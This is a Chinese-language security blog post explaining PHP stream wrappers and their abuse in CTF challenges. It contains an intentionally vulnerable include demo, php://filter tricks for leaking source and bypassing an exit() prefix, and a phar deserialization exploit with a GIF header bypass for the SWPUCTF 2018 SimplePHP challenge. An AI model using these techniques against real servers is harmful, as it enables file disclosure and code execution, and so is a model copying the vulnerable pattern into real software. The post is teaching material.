<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/wallhaven-1p398w.jpg?v=2.8.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/wallhaven-1p398w.jpg?v=2.8.0" type="image/png" sizes="32x32"><meta name="description" content="一.什么是PHP伪协议       PHP伪协议是PHP内置的具有URL风格的封装协议，可以实现特定功能 常见的PHP伪协议及其配置要求  此配置页可以在phpinfo()下进行查看                     二.常见的PHP伪协议                           1.file:&#x2F;&#x2F;       用于访问本地的文件系统,在C">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP伪协议实战分析">
<meta property="og:url" content="http://example.com/2022/12/09/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE%E5%AE%9E%E6%88%98%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="Icfh_Blog">
<meta property="og:description" content="一.什么是PHP伪协议       PHP伪协议是PHP内置的具有URL风格的封装协议，可以实现特定功能 常见的PHP伪协议及其配置要求  此配置页可以在phpinfo()下进行查看                     二.常见的PHP伪协议                           1.file:&#x2F;&#x2F;       用于访问本地的文件系统,在C">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/6ffd5584142445ca9df190866ae32c33~tplv-k3u1fbpfcp-watermark.image">
<meta property="og:image" content="https://img-blog.csdnimg.cn/8530022c27c648b98ac48f583207790d.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/5a696f5cf3fd43319f6958c5de1f20df.png">
<meta property="og:image" content="https://images.seebug.org/content/images/2018/08/44a2f1dc-1c23-4638-8f6e-24fc75d68c2a.png-w331s">
<meta property="og:image" content="https://img-blog.csdnimg.cn/8779019400bd4812a2d4dd21a12d1828.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/485041dcd7ce45f699d7e2b7a1a6ce69.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/db5661cccf50438f9a6c1d8c2e663f38.png">
<meta property="og:image" content="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/1a31d51ddde545aa91a10fe988df2b55~tplv-k3u1fbpfcp-zoom-in-crop-mark:3024:0:0:0.awebp">
<meta property="article:published_time" content="2022-12-09T14:46:13.000Z">
<meta property="article:modified_time" content="2022-12-14T13:25:22.931Z">
<meta property="article:author" content="Icfh">
<meta property="article:tag" content="PHP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/6ffd5584142445ca9df190866ae32c33~tplv-k3u1fbpfcp-watermark.image"><title>PHP伪协议实战分析 | Icfh_Blog</title><link ref="canonical" href="http://example.com/2022/12/09/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE%E5%AE%9E%E6%88%98%E5%88%86%E6%9E%90/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.8.0"><link rel="stylesheet" href="css/custom.css"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":true},
  reward: false,
  fancybox: true,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: {"avoidBanner":false},
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"yep,copy success!","copyError":"sry,copy failure!"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.3.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">分类</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/about/"><span class="header-nav-menu-item__icon"><i class="fas fa-user"></i></span><span class="header-nav-menu-item__text">关于</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/read/"><span class="header-nav-menu-item__icon"><i class="fas fa-book"></i></span><span class="header-nav-menu-item__text">阅读</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Icfh</div><div class="header-banner-info__subtitle">目前是一个人菜瘾大的Web安全狗</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">PHP伪协议实战分析</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2022-12-09</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2022-12-14</span></span></div></header><div class="post-body">
        <h2 id="一-什么是PHP伪协议"   >
          <a href="#一-什么是PHP伪协议" class="heading-link"><i class="fas fa-link"></i></a><a href="#一-什么是PHP伪协议" class="headerlink" title="一.什么是PHP伪协议"></a>一.什么是PHP伪协议</h2>
      <p>PHP伪协议是PHP内置的具有URL风格的封装协议，可以实现特定功能</p>
<p>常见的PHP伪协议及其配置要求</p>
<p><img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/6ffd5584142445ca9df190866ae32c33~tplv-k3u1fbpfcp-watermark.image" alt="image.png"></p>
<p>此配置页可以在phpinfo()下进行查看</p>

        <h2 id="二-常见的PHP伪协议"   >
          <a href="#二-常见的PHP伪协议" class="heading-link"><i class="fas fa-link"></i></a><a href="#二-常见的PHP伪协议" class="headerlink" title="二.常见的PHP伪协议"></a>二.常见的PHP伪协议</h2>
      
        <h3 id="1-file"   >
          <a href="#1-file" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-file" class="headerlink" title="1.file://"></a>1.<code>file://</code></h3>
      <p>用于访问本地的文件系统,在CTF中常常用来读取本地文件</p>
<p><strong>特点：不受<code>php.ini</code>中<code>allow_url_fopen</code>与<code>allow_url_include</code>的配置影响</strong></p>
<p><strong>用法示例：</strong></p>
<blockquote>
<p><strong>file:&#x2F;&#x2F;+路径：</strong></p>
<p>在本地部署<code>include.php</code>和<code>test.php</code>，上传测试  “<code>file://+路径</code>“</p>
</blockquote>
<p>demo:</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//test.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;这是test.php文件&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;Your &#x27;GET&#x27; input is: &quot;</span>.<span class="variable">$file</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">include</span> <span class="variable">$file</span>;</span><br></pre></td></tr></table></div></figure>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//include.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;这是include.php文件&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;被include了1&quot;</span>;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>结果如图:<br><img src="https://img-blog.csdnimg.cn/8530022c27c648b98ac48f583207790d.png" alt="image.png"></p>

        <h3 id="2-php"   >
          <a href="#2-php" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-php" class="headerlink" title="2.php://"></a>2.<code>php://</code></h3>
      <p>用于处理I&#x2F;O streams。</p>
<p>常用的是<code>php://filter</code>和<code>php://input</code>,当然还有其他诸如<code>php://input</code>和<code>php://output</code>、<code>php://stdin</code>和<code>php://stdout</code>的伪协议。</p>

        <h4 id="1-gt-php-filter"   >
          <a href="#1-gt-php-filter" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-gt-php-filter" class="headerlink" title="1&gt;php://filter"></a><code>1&gt;php://filter</code></h4>
      <blockquote>
<p>参数说明:</p>
</blockquote>
<p>1.resource &#x3D; &lt;&gt;</p>
<p>2.read &#x3D; &lt;&gt;</p>
<p>3.write &#x3D; &lt;写链的过滤器&gt;</p>
<p>4.分号;  用于连接多个过滤器</p>
<blockquote>
<p>常见的过滤器有：转换过滤器、字符串过滤器、压缩过滤器、加密过滤器</p>
</blockquote>
<p>实战应用:</p>
<p>（1）转换过滤器</p>
<blockquote>
<p>base64编码和解码</p>
<p>php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource &#x3D; file.php</p>
<p>php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-decode&#x2F;resource &#x3D; file.php</p>
</blockquote>
<blockquote>
<p>获取PHP源码:</p>
</blockquote>
<p>经过convert.base64-encode过滤器之后，读取的resource内容将以base64编码形式回显。</p>
<p>如果resource指向的是一个PHP文件的话，未经编码则会进行PHP文件的执行。<br>当编码后会以编码后的字符串回显，从而达到获取PHP源码信息。</p>
<blockquote>
<p>绕过死亡exit()，上传? ：</p>
</blockquote>
<p>这种一般存在于缓存、配置文件等等不允许用户直接访问的文件情景中。</p>
<p>demo：</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"><span class="variable">$content</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;content&#x27;</span>];</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$file</span>, <span class="string">&#x27;&lt;?php exit();&#x27;</span>.<span class="variable">$content</span>);</span><br></pre></td></tr></table></div></figure>

<p>绕过手段：</p>
<p><code>$file = php://filter/read=convert.base64-decode/resource = backdoor.php</code></p>
<p>基于base64解码时需要四个字符为一组,在进行解码的时候会对非64个可视字符(a-zA-Z0-9+&#x2F;)进行绕过,那么我们此处就对死亡exit产生影响:phpexit</p>
<p>所以上传 $content &#x3D; a…..(base64编码)(开头的a可以与前面的phpexit进行拼接)</p>
<p>当然也可以使用rot13进行绕过，此处不再赘述…</p>
<p> (2)字符串过滤器</p>
<blockquote>
<p>rot13加密</p>
<p>php:&#x2F;&#x2F;filter&#x2F;read&#x3D;string.rot13&#x2F;resource &#x3D; file.php</p>
</blockquote>
<blockquote>
<p>大小写转换</p>
<p>php:&#x2F;&#x2F;filter&#x2F;read&#x3D;string.toupper&#x2F;resource &#x3D; file.php   (大写)</p>
<p>php:&#x2F;&#x2F;filter&#x2F;read&#x3D;string.tolower&#x2F;resource &#x3D; file.php   (小写)</p>
</blockquote>
<blockquote>
<p>在读取的字符串中删去HTML和PHP标签、空字符串</p>
<p>php:&#x2F;&#x2F;filter&#x2F;read&#x3D;string.strip_tags&#x2F;resource &#x3D; file.php</p>
</blockquote>

        <h4 id="2-gt-php-input"   >
          <a href="#2-gt-php-input" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-gt-php-input" class="headerlink" title="2&gt;php://input"></a><code>2&gt;php://input</code></h4>
      <p>访问请求的原始数据的只读流</p>
<p>demo:</p>
<figure class="highlight html"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>Title<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;backend.php&quot;</span> <span class="attr">method</span>=<span class="string">&quot;post&quot;</span>&gt;</span></span><br><span class="line">      name:<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> <span class="attr">name</span>=<span class="string">&quot;name&quot;</span> <span class="attr">value</span>=<span class="string">&quot;icfh&quot;</span>/&gt;</span><span class="tag">&lt;<span class="name">br</span>/&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;Submit&quot;</span> /&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></div></figure>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$name</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$name</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line"><span class="variable">$content</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;php://input&quot;</span>);</span><br><span class="line"><span class="comment"># 获取post的只读数据流</span></span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="variable">$content</span>);</span><br></pre></td></tr></table></div></figure>


        <h3 id="3-data-x2F-x2F"   >
          <a href="#3-data-x2F-x2F" class="heading-link"><i class="fas fa-link"></i></a><a href="#3-data-x2F-x2F" class="headerlink" title="3.data:&#x2F;&#x2F;"></a>3.data:&#x2F;&#x2F;</h3>
      <p>数据流包装器</p>
<blockquote>
<p>data:&#x2F;&#x2F;text&#x2F;plain;base64,(base64的编码内容)</p>
</blockquote>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//?prints?&quot;I?love?PHP&quot;</span></span><br><span class="line"><span class="keyword">echo</span>?<span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;data://text/plain;base64,SSBsb3ZlIFBIUAo=&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></div></figure>


        <h3 id="4-phar-x2F-x2F"   >
          <a href="#4-phar-x2F-x2F" class="heading-link"><i class="fas fa-link"></i></a><a href="#4-phar-x2F-x2F" class="headerlink" title="4.phar:&#x2F;&#x2F;"></a>4.phar:&#x2F;&#x2F;</h3>
      <p>简单理解就是将文件进行压缩归档，此过程会涉及对象的序列化。<br>在解压的时候自然会涉及反序列化，那么只要设计合适的恶意对象就可以引发反序列化漏洞。</p>
<p>官方文档：<br><img src="https://img-blog.csdnimg.cn/5a696f5cf3fd43319f6958c5de1f20df.png"></p>
<p>PHP内核：<br><img src="https://images.seebug.org/content/images/2018/08/44a2f1dc-1c23-4638-8f6e-24fc75d68c2a.png-w331s"></p>
<p>demo:</p>
<p>phar文件的四个要素:<br><img src="https://img-blog.csdnimg.cn/8779019400bd4812a2d4dd21a12d1828.png"></p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//phpinfo();    //先查看php.ini中的readonly是否为off</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;PHP反序列化漏洞&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$phar</span> = <span class="keyword">new</span> <span class="title class_">Phar</span>(<span class="string">&quot;test.phar&quot;</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">startBuffering</span>();                                   <span class="comment"># 文件读写缓冲区</span></span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">setStub</span>(<span class="string">&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;</span>);             <span class="comment"># phar文件头信息</span></span><br><span class="line"><span class="variable">$o</span> = <span class="keyword">new</span> <span class="title class_">Test</span>();</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">setMetadata</span>(<span class="variable">$o</span>);           <span class="comment"># mainfest中的meta-data字段会进行序列化操作</span></span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">addFromString</span>(<span class="string">&quot;test.txt&quot;</span>, <span class="string">&quot;test&quot;</span>);                  <span class="comment"># content部分</span></span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">stopBuffering</span>();                                    <span class="comment"># 关闭缓冲区</span></span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>在同个目录下生成了phar文件且同时触发了魔法函数</p>
<p><img src="https://img-blog.csdnimg.cn/485041dcd7ce45f699d7e2b7a1a6ce69.png"><br><img src="https://img-blog.csdnimg.cn/db5661cccf50438f9a6c1d8c2e663f38.png"></p>

        <h2 id="三-CTF题目实战"   >
          <a href="#三-CTF题目实战" class="heading-link"><i class="fas fa-link"></i></a><a href="#三-CTF题目实战" class="headerlink" title="三.CTF题目实战"></a>三.CTF题目实战</h2>
      
        <h3 id="0x01-ACTF2020-新生赛-Include"   >
          <a href="#0x01-ACTF2020-新生赛-Include" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x01-ACTF2020-新生赛-Include" class="headerlink" title="0x01.[ACTF2020 新生赛]Include"></a>0x01.[ACTF2020 新生赛]Include</h3>
      <p>利用php:&#x2F;&#x2F;filter的读链转换器读取源码<br><img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/1a31d51ddde545aa91a10fe988df2b55~tplv-k3u1fbpfcp-zoom-in-crop-mark:3024:0:0:0.awebp"></p>

        <h3 id="0x02-SWPUCTF-2018-SimplePHP"   >
          <a href="#0x02-SWPUCTF-2018-SimplePHP" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x02-SWPUCTF-2018-SimplePHP" class="headerlink" title="0x02.[SWPUCTF 2018]SimplePHP"></a>0x02.[SWPUCTF 2018]SimplePHP</h3>
      <p>这里只展示用到phar的地方，此题是配合phar触发反序列化的文件上传漏洞题目。</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 类声明</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">C1e4r</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$test</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$str</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Show</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$source</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$str</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$file</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$params</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 反序列化逻辑链:</span></span><br><span class="line"><span class="comment">// Cle4r:__destruct =&gt; echo Show类 =&gt; Show:__toString =&gt;</span></span><br><span class="line"><span class="comment">// Show-&gt;str[&#x27;str&#x27;]=Test =&gt; Test: __get (source) =&gt; Test: get(source)</span></span><br><span class="line"><span class="comment">// =&gt;Test:$params[&#x27;source&#x27;]=f1ag.php -&gt; Test:file_get() 获得源码</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">// 恶意对象</span></span><br><span class="line"><span class="variable">$c1e4r</span> = <span class="keyword">new</span> <span class="title class_">C1e4r</span>();</span><br><span class="line"><span class="variable">$show</span> = <span class="keyword">new</span> <span class="title class_">Show</span>();</span><br><span class="line"><span class="variable">$test</span> = <span class="keyword">new</span> <span class="title class_">Test</span>();</span><br><span class="line"></span><br><span class="line"><span class="variable">$test</span>-&gt;params[<span class="string">&#x27;source&#x27;</span>] = <span class="string">&#x27;f1ag.php&#x27;</span>;</span><br><span class="line"><span class="variable">$show</span>-&gt;str[<span class="string">&#x27;str&#x27;</span>] = <span class="variable">$test</span>;</span><br><span class="line"><span class="variable">$c1e4r</span>-&gt;str = <span class="variable">$show</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">//Phar文件生成模板</span></span><br><span class="line"><span class="variable">$phar</span> = <span class="keyword">new</span> <span class="title class_">Phar</span>(<span class="string">&quot;test.phar&quot;</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">startBuffering</span>();</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">setStub</span>(<span class="string">&quot;GIF89a&lt;?php __HALT_COMPILER();?&gt;&quot;</span>);<span class="comment">//设置GIF(绕过验证)和Phar标识头</span></span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">setMetadata</span>(<span class="variable">$c1e4r</span>);<span class="comment">// 再meta-data中放入恶意对象</span></span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">addFromString</span>(<span class="string">&quot;test.txt&quot;</span>,<span class="string">&quot;test&quot;</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">stopBuffering</span>();</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<hr>

        <h2 id="四-参考链接："   >
          <a href="#四-参考链接：" class="heading-link"><i class="fas fa-link"></i></a><a href="#四-参考链接：" class="headerlink" title="四.参考链接："></a>四.参考链接：</h2>
      <p>1.<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://www.tlcement.com/36491.html" >http://www.tlcement.com/36491.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>2.官方文档：<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.php.net/manual/en/wrappers.php.php" >PHP: php:&#x2F;&#x2F; - Manual</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>3.利用php伪协议进行绕过死亡exit()函数：<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.cnblogs.com/meng-han/p/16849600.html" >伪协议绕过死亡代码&lt;?php exit();（file_put_contents） - hithub - 博客园 (cnblogs.com)</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>4.PHAR跳跳糖社区:<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://tttang.com/archive/1732/#toc_phar" >https://tttang.com/archive/1732/#toc_phar</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>5.<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://paper.seebug.org/680/" >https://paper.seebug.org/680/</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="http://example.com">Icfh</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="http://example.com/2022/12/09/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE%E5%AE%9E%E6%88%98%E5%88%86%E6%9E%90/">http://example.com/2022/12/09/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE%E5%AE%9E%E6%88%98%E5%88%86%E6%9E%90/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh-cn" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://example.com/tags/PHP/">PHP</a></span></div><nav class="post-paginator paginator"><div class="paginator-next"><a class="paginator-next__link" href="/2022/12/09/hello-world/"><span class="paginator-prev__text">Hello World</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside 